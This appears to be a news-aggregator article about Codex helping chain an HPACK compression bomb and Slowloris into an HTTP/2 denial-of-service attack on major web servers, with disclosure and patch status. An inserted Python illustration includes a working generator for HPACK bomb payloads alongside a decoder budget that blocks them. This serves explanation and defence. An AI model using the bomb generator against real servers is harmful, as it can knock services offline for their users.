BotBeat
OpenAI · Research · 2026-06-05

OpenAI's Codex Chains Decade-Old Exploits Into Critical HTTP/2 DoS Attack Affecting 880,000+ Websites

Key Takeaways

  • OpenAI's Codex model autonomously chained two 10+ year-old DoS techniques (the HPACK compression bomb and Slowloris) into a novel "HTTP/2 Bomb" that can take vulnerable servers offline in seconds
  • A single machine on a 100Mbps connection can render vulnerable Apache httpd and Envoy servers inaccessible, consuming and holding 32GB of server memory in roughly 20 seconds
  • The vulnerability potentially affects 880,000+ websites serving HTTP/2 via nginx, Apache httpd, IIS, Envoy, or Cloudflare Pingora; nginx and Apache have shipped patches, while Microsoft is still investigating IIS mitigations and Cloudflare disputes that Pingora is exposed
Source: The Register (via Hacker News): https://www.theregister.com/security/2026/06/04/openais-codex-chains-decade-old-dos-techniques-into-http/2-bomb/5251377

Summary

OpenAI's Codex agent has helped uncover a critical denial-of-service vulnerability that researchers are calling the "HTTP/2 Bomb": it chains two well-known attacks from the past decade into a novel exploit. Quang Luong, a researcher at security firm Calif, found that Codex could combine an HPACK compression bomb with Slowloris-style connection holding into a single attack that renders vulnerable web servers inaccessible in seconds. The vulnerability works against major HTTP/2 implementations including nginx, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora, potentially affecting 880,000+ websites.
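The page names the HPACK compression bomb as one half of the chain but gives no mechanics, and Luong's actual exploit and the nginx/Apache fixes are not described here. The block below is an added illustration (not code from Calif, OpenAI, The Register, or any of the affected projects) of the generic HPACK bomb from RFC 7541: one literal header fills the 4096-byte dynamic table, after which every further one-byte indexed reference decodes into a ~4KB header. It also shows the standard counter-measure a decoder should apply, a SETTINGS_MAX_HEADER_LIST_SIZE-style budget (RFC 7540 s6.5.2) checked per field, so the block is rejected after kilobytes rather than after the list has grown to gigabytes. Huffman coding and most of the static table are omitted as simplifications; the Slowloris half of the chain (holding many such connections open) is not modelled.

```python
"""Minimal HPACK (RFC 7541) encoder/decoder illustrating the compression-bomb
amplification and the header-list budget that defeats it.

Constructed illustration; not the Calif exploit and not any server's patch.
Huffman strings and most static-table entries are deliberately left out.
"""
from __future__ import annotations

DEFAULT_TABLE_SIZE = 4096   # SETTINGS_HEADER_TABLE_SIZE default
ENTRY_OVERHEAD = 32         # RFC 7541 s4.1: entry size = len(name) + len(value) + 32
STATIC_TABLE_LEN = 61       # dynamic-table entries start at index 62
# Tiny subset of RFC 7541 Appendix A; a real decoder carries all 61 entries.
STATIC_TABLE = {1: (b":authority", b""), 2: (b":method", b"GET"),
                3: (b":method", b"POST"), 4: (b":path", b"/")}


class HeaderListTooLarge(Exception):
    """Decoded header list exceeded the configured budget."""


def encode_int(value: int, prefix_bits: int, flags: int = 0) -> bytes:
    """RFC 7541 s5.1 integer with an N-bit prefix; `flags` are the leading bits."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def decode_int(buf: bytes, pos: int, prefix_bits: int) -> tuple[int, int]:
    """Inverse of encode_int; returns (value, position after the integer)."""
    limit = (1 << prefix_bits) - 1
    value = buf[pos] & limit
    pos += 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def encode_string(s: bytes) -> bytes:
    """RFC 7541 s5.2 string literal with the H (Huffman) bit clear."""
    return encode_int(len(s), 7) + s


def decode_string(buf: bytes, pos: int) -> tuple[bytes, int]:
    if buf[pos] & 0x80:
        raise NotImplementedError("Huffman-coded strings are not handled here")
    length, pos = decode_int(buf, pos, 7)
    return bytes(buf[pos:pos + length]), pos + length


def build_hpack_bomb(repeats: int, table_size: int = DEFAULT_TABLE_SIZE) -> bytes:
    """One header block: a literal that exactly fills the dynamic table, then
    `repeats` one-byte indexed references to it (s6.2.1 then s6.1)."""
    name = b"x"
    value = b"A" * (table_size - ENTRY_OVERHEAD - len(name))  # one max-size entry
    literal = bytes([0x40]) + encode_string(name) + encode_string(value)  # 01 + index 0
    indexed = encode_int(STATIC_TABLE_LEN + 1, 7, flags=0x80)  # index 62 = newest entry
    return literal + indexed * repeats


def _lookup(index: int, dynamic: list[tuple[bytes, bytes]]) -> tuple[bytes, bytes]:
    if 1 <= index <= STATIC_TABLE_LEN:
        if index not in STATIC_TABLE:
            raise NotImplementedError("static-table entry not carried in this illustration")
        return STATIC_TABLE[index]
    try:
        return dynamic[index - STATIC_TABLE_LEN - 1]
    except IndexError:
        raise ValueError(f"bad index {index}") from None


def decode_header_block(block: bytes, max_header_list_size: int | None = None,
                        max_table_size: int = DEFAULT_TABLE_SIZE) -> list[tuple[bytes, bytes]]:
    """Decode a header block, enforcing a SETTINGS_MAX_HEADER_LIST_SIZE-style
    budget on the running sum of name+value+32 *before* each field is kept."""
    dynamic: list[tuple[bytes, bytes]] = []  # index 0 = most recently added
    dynamic_size = 0
    headers: list[tuple[bytes, bytes]] = []
    list_size = 0
    pos = 0
    while pos < len(block):
        first = block[pos]
        if first & 0x80:                      # 1xxxxxxx: indexed header field
            index, pos = decode_int(block, pos, 7)
            name, value = _lookup(index, dynamic)
            add_to_table = False
        elif first & 0x40:                    # 01xxxxxx: literal, incremental indexing
            index, pos = decode_int(block, pos, 6)
            if index:
                name = _lookup(index, dynamic)[0]
            else:
                name, pos = decode_string(block, pos)
            value, pos = decode_string(block, pos)
            add_to_table = True
        else:
            raise NotImplementedError("only the representations used by the bomb are handled")
        list_size += len(name) + len(value) + ENTRY_OVERHEAD
        if max_header_list_size is not None and list_size > max_header_list_size:
            raise HeaderListTooLarge(f"header list exceeds {max_header_list_size} bytes")
        headers.append((name, value))
        if add_to_table:
            dynamic.insert(0, (name, value))
            dynamic_size += len(name) + len(value) + ENTRY_OVERHEAD
            while dynamic_size > max_table_size:  # eviction from the oldest end, s4.3
                n, v = dynamic.pop()
                dynamic_size -= len(n) + len(v) + ENTRY_OVERHEAD
    return headers


def amplification(block: bytes) -> float:
    """Decoded header-list bytes per wire byte when no budget is enforced."""
    decoded = sum(len(n) + len(v) + ENTRY_OVERHEAD for n, v in decode_header_block(block))
    return decoded / len(block)
```

With 1,000 references the block is about 5KB on the wire and decodes to roughly 4MB (about 800x); the per-entry ceiling is the 4096-byte table size, which is why a bomb alone is bounded and why the page's account has it paired with Slowloris-style connection holding. With a 64KB header-list budget the same block is rejected after the first dozen or so fields.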

The attack's effectiveness is alarming: a single machine on a standard 100Mbps connection can crash a vulnerable server in seconds, and against Apache httpd and Envoy, a single client can consume and hold 32GB of server memory in approximately 20 seconds. Calif responsibly disclosed the vulnerability in April, and nginx and Apache have already released patches (nginx v1.29.8 and Apache mod_http2 v2.0.41). However, Microsoft IIS and Cloudflare Pingora remain unpatched, though Cloudflare disputes the finding and claims its existing DDoS mitigations protect against the attack. Microsoft said it is "actively investigating appropriate mitigations."

The significance of this discovery extends beyond the vulnerability itself: Codex demonstrated the ability to read public codebases and commit diffs from security patches, then synthesize that information into a working exploit—a capability previously associated only with human security researchers. Luong will present full technical details at the Real World AI Security conference later this month, while proof-of-concept exploit code is already available on GitHub.

  • Codex's ability to analyze public code diffs and synthesize them into functional exploits highlights both the security and safety implications of advanced AI code analysis tools
  • Responsible disclosure in April gave nginx and Apache time to ship patches before publication, but the incident shows how AI assistance is shortening the gap between vulnerability discovery and potential widespread exploitation

Editorial Opinion

This discovery is a watershed moment for AI security: it proves that large language models can now perform the sophisticated pattern-matching and code synthesis traditionally reserved for expert security researchers. While the responsible disclosure and rapid patching are encouraging, organizations should take note—the era when security-through-obscurity bought time is ending. AI models will increasingly uncover vulnerabilities faster than humans can patch them, making proactive security architecture and rapid patching cycles not optional but essential.

Tags: Generative AI · Cybersecurity · AI Safety & Alignment

© 2026 BotBeat